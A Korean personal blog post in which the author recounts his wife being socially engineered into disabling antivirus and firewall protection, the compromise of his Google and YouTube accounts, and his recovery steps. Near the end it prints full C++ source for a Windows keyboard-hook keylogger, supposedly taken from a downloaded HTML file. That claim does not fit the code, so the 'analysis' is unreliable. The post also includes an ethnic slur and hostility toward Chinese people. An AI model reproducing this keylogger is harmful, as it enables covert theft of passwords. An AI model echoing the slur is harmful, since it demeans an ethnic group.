와....완전 멘탈 나갔습니다. 해킹당함(?) + 부부싸움

와....완전 멘탈 나갔습니다.해킹당함(?) + 부부싸움

필자가 보통은 보안에 대해서 굉장히 신경을 많이 쓰는 편이다. 그런데, 필자가 해킹(?)을 좀 당하게 되었네요.

엥? 이게 무슨 소리냐고요? 정말 어이가 없는게...... 보통 제가 구글계정이 로그인해서 사용하는 기기는 사무실에 있는 업무용 PC, 업무용 노트북. 그리고, 휴대전화(삼성 갤럭서 노트10) 뿐이다.

올해 초부터 마눌님이 챗GTP(필자의 경우에는 학습을 꽤 잘 시켜놔서 필자가 원하는 답을 굉장히 잘 만들어내는 편이다)를 사용해야 한다고 해서...어떻게 하는지 잘 모른다고 해서...우진이가 사용하는 게임용 PC에 필자의 구글계정으로 로그인을 해뒀다. 그런데, 필자의 경우에는 각 브라우져 마다 한번씩 실행하면 무조건 휴대전화로 2중인증을 다 걸어두었는데 집에 있는 우진이 PC의 크롬을 끄고 다시 켜면 무조건 로그아웃이 되도록 설정을 해놓아서 마눌님이 챗GTP를 사용하기 위해서 크롬을 실행할때마다 계속 로그인하라고 나오니까 불편하다고 짜증을 많이 내었다. 그래서 구글계정 자동로그인 환경으로 설정 해뒀다.

그리고, 구글계정 및 비밀번호를 알려달라고서 가르쳐줬다. (이게 아주 치명적인 실수다)

그래서, 아주 조심해서 써야한다고 내 계정은 유튜브 스튜디오 계정하고, 각종 AI 관련 (챗GTP 등....꽤 많다)으로 모든것이 연동되어 있으니까 정말 조심해서 써야한다고 했다. 솔직히 필자는 퇴근하고 오면 집에 있는 PC나 노트북을 잘 사용하지 않는 편이라서 거의 신경을 쓰지 않는다. 며칠전부터 마눌님이 PC가 계속 이상하다고 해서 그냥 재부팅해서 사용하라고 했고....크게 신경을 쓰지 않았는데... 간혹 마우스의 커서가 자동으로 움직인다고 했다.

어제 갑자기... 필자의 휴대폰으로 구글 로그인 알람이 날아왔다.   필자는 어제 휴대폰으로 웹툰을 보고 있었다. 엥??? 마눌은 PC나 노트북을 사용하지도 않고 있고 TV를 보고 있었다.

어라?? 뭐지? 어쩐지 느낌이 쌔하다... 갑자기 유튜브 채널이 중지되어있다. 너무 당황해서 나도 멘탈이 나갔다. 필자의 비밀번호는 현재 총 16자리(대문자, 특수문자, 소문자, 숫자 다 들어간다)로써 정말 강력하다. 정말 유추하기 힘들  정도로 복잡하게 해뒀다. 

그래서 본의 아니게 부부싸움이 되었다. 마눌은 정말 아무것도 모른다. 그냥 사용하는 것 밖에 모른다. 마눌은 아무것도 한것 없다고 화를 내고 오히려 화가 나는것은 필자가 더 화가 난다. " 아니 어떻게 사용한거냐고 ...." 너무 화가 나서 나도 모르게 화를 냈다. 이때까지 채널 키운다고 3년 정도를 투자했는데....이게 왠 날벼락이냐고.....정말 울고 싶다.

그래서, 우진이가 사용하는 PC를 확인하기 시작했다. 일단 인터넷 연결을 끊자. 간단하다 .LAN 케이블을 제거하면 된다. 일단 인터넷이 안되는 것은 확인하고...이제 문제의 이 PC를 확인해보자. 백신의 실시간 감시가 꺼져있다. 어라....이게 왜? 어차피 인터넷을 끊어놨으니 다운 받는 것도 불가능하지만 필자는 항상 USB안에 백신 설치파일(V3, 알약)을 가지고 다닌다. 이걸로 삭제하고 재설치를 진행해보자. 보통은 2개 다 설치를 안하지만 이번에는 경우가 다르다. 백신을 2개 이상 설치하게 되면 느려져서 권장하지는 않지만 ....그리고, 최신 엔진은 아니지만 실시간 감시는 된다. 그리고, 정밀검사를 진행하자. 헉....원격제어 프로그램이 설치되어 있다. 보안상 모자이크 처리를.....이게 악용될 수 있는 사례라서...

아...쓰벌....이게 뭐꼬...

알약으로 또 검사를 해보자

헉...트로이의 목마까지...

윈도우 방화벽은 왜 내려져 있는지 이해가 안간다.

마눌한테 화낸거 사과하고....일단 옆에 앉아보라고 했다. 어느 사이트 접속했고 뭐 다운 받았는지 확인을 해봤다. 이상해 보이는 다운로드 폴더안에 html 파일이 잔뜩 보인다. 안된다고 계속 다운 받은 흔적도 많다.

마눌은 이거 실행이 안되서 계속 눌렀고 거기에서 이거 실행하기 위해서는 백신 중지하라고 시켰고 윈도우 방화벽도 시키는 대로 차단했다고 이야기 한다. ㅠㅠ  에고....인적 해킹에 당했다고 봐야겠다.

흔히들 해킹에는 기계적 해킹과 인적 해킹이 있는데 요즘 기계적 해킹은 굉장히 힘들고 인적 해킹을 많이 사용하는데 사람의 심리를 이용한 해킹 기법이라고 보시면 되겠다.

아니 남편이 이런 일을 하는데 모르면 그냥 물어보면 되는거지...해당 사이트에서 하라고 하는대로 하면 어떻게 하자는 말인교?

이제 노트북으로 로그인을 해봤다. 일단 된다. 그리고, 구글계정 로그인 이력을 뒤져봤다.

2월 16일이면 대충 올초에  우진이 게임용 PC에 구글계정으로 로그인 해준지 1개월이 지난 시점이다. 그럼 우진이 PC에서 문제가 생겼다는 것이 확실하다.  

강제로 원격으로 로그아웃 시켰다.

또한 구글계정의 로그인 비밀번호도 더 빡세게 변경했다. (무려 20자리로 변경....이젠 나도 헷갈린다. ㅠㅠ)

마눌이 다운받았다는 html 파일이 있어서 ....일단 살펴보자.

우진이 PC에 저장된  html 파일을 분석해봤다.

#include <windows.h>
#include <fstream>

HHOOK keyboardHook;
std::ofstream logFile("keylog.txt", std::ios::app);

// 키보드 후크 콜백 함수
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode == HC_ACTION) {
        KBDLLHOOKSTRUCT* p = (KBDLLHOOKSTRUCT*)lParam;

        if (wParam == WM_KEYDOWN) {
            DWORD vkCode = p->vkCode;

            // 로그 파일에 기록
            logFile << "Key Pressed: " << vkCode << std::endl;

            // 예: A 키는 0x41, Enter는 0x0D
            // logFile << "Key Pressed: " << char(vkCode) << std::endl;
        }
    }

    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

// WinMain: 키보드 후크 설치 및 메시지 루프
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, 0);

    if (!keyboardHook) {
        MessageBox(NULL, "후크 설치 실패", "Error", MB_ICONERROR);
        return 1;
    }

    // 메시지 루프 유지
    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    UnhookWindowsHookEx(keyboardHook);
    logFile.close();
    return 0;
}

아....젠장....이건 키로거 (keylogger)이다. 상대방이 키보드를 누를때 누르는 키가 해커에게 넘어가도록 만드는 해킹 프로그램이다. 그래서 요즘 금융권이나 이런데 접속하면 가상 키패드를 사용하는 이유가 이것 때문이기도 하다.

이미지출처: 구글

그리고....맨 맨줄에 보이는 이상한 중국글자 하나...我是一个骄傲的中国人   ????

노트북을 이용해서 챗GTP한테 물어보니 나는 자랑스러운 중국인이다 라고 나온다. 아....진짜 썩을놈의 짱깨 새끼들이.....

솔직히 필자가 중국을 비방하는 글과 영상을 많이 만들었다. 중국이라면 정말 치가 떨린다.

안 그래도 평소에 필자가 중국이라고 하면 극혐을 하는데 순진한 우리 마눌을 꼬득여서 이렇게 만들었다는 것이 너무 너무 화가 났다.  우진이 게임용 PC는 당장 사용금지령을 내렸고, 여기에서 혹시 로그인 했냐고 물어보니까.....네이버, 다음,  카카오톡 등...많이 했다고 한다. 

곰곰히 생각해보니까 필자가 비밀번호 20자리로 바꿔도 별의미가 없다는 생각이 든다. 어차피 키로거가 설치된 기기라고 하면 비밀번호가 100자리를 넣어도 어차피 해커에게 그대로 다 넘어가는 것이니 비밀번호 길이도 중요하지만 각 사이트마다 같은 ID에 동일한 비밀번호를 유지하는 것이 정말로 위험하다는 것을 뼈져리게 느꼈다. 필자의 경우에는 각 사이트마다 비밀번호가 모두 다르다. 지금도 정말 머리 아픈데 이번에 구글까지 20자리로 변경했으니...더 머리가 아파진다.

혹시나 싶어서 자주 접속하는 사이트의 ID와 비번이 모두 동일하냐고 물어보니  역시나 다 똑같다고 한다. 모든 비밀번호를 필자가 임의대로 모두 다 변경해버렸다 물론 이중인증까지 다 걸어서....... 그래서, 비밀번호가 저장된 텍스트 파일을 하나 만들어서 USB로 복사해뒀다. 이젠 정말 비밀번호를 관리해주는 사이트도 있어야 하는가? 하는 생각이 든다. 정말 비밀번호 홍수다.  휴대폰을 제외한 전체 기기에서 모두 다 로그아웃을 다 시켜버리고 전부다 새롭게 로그인을 하였다. 물론 지금 사용중인 노트북도 예외가 될수 없다.

이렇게 작업한 후 유튜브 스튜디오로 접속해서 채널이 중지되어 있는 것을 다시 활성화 시켜주니 채널이 살아났다.

모든 계정을 다 원격으로 중지시켜 버리고 해커가 필자의 비밀번호를 변경하기 전에 작업을 진행한 것이 매우 컸다.

정말 천만다행이라고 생각한다. 이 정도면 정말 빨리 복구했다고 생각한다.

모든 보안작업을 마치니까 그 다음날이 되었다. 에고...힘들다. 옆에 마눌은 쓰러져서 zZ를 그리고 있다. 이런 사고를 치고 혼자 자고 있네....어이가 없다.

평소에 보안이 얼마나 중요한지 새삼 느껴보는 하루였다. 지금은 그 다음날이다 . ㅠㅠ 힘들다.

그나마 천만다행인게 노트북이 있어서 이 작업이 가능했다는 것이다. 이 PC는 당장 포맷이다. 그리고, 마눌이 사용하지 못 하도록 네트워크 케이블을 잘라 놨다. 이러면 못 쓰겠지. 내가 없는 동안 또 사용하면 정말 곤란하다.

이미지출처: 구글

좀 귀찮지만 이 PC를 포맷할 외장하드랑 RJ 45 jack, Tool도 좀 챙겨와야겠다. 집에서 RJ 45를 찍어야 한다니 뭔가 이상하다.

필자가 얼마나 황당했으면 네트워크 케이블을 잘라버렸겠는가? 이렇게 악성코드에 감염된 불결한 PC는 절대 사용해서는 안된다. 

무조건 포맷이다. 그나마 랜섬웨어가 아니라서 천만다행이라고 생각한다. 그래도 힘들었다.

해킹당하게 되면 문제는 나를 사칭한 사람이 저지른 범죄가 나한테 그대로 날아올수도 있다는 이야기가 된다.

정말 무서운 세상이다.

이젠 진짜 잠 잘꺼다. 오늘의 포스팅을 마친다. 정말 울고 싶다. 흑흑.....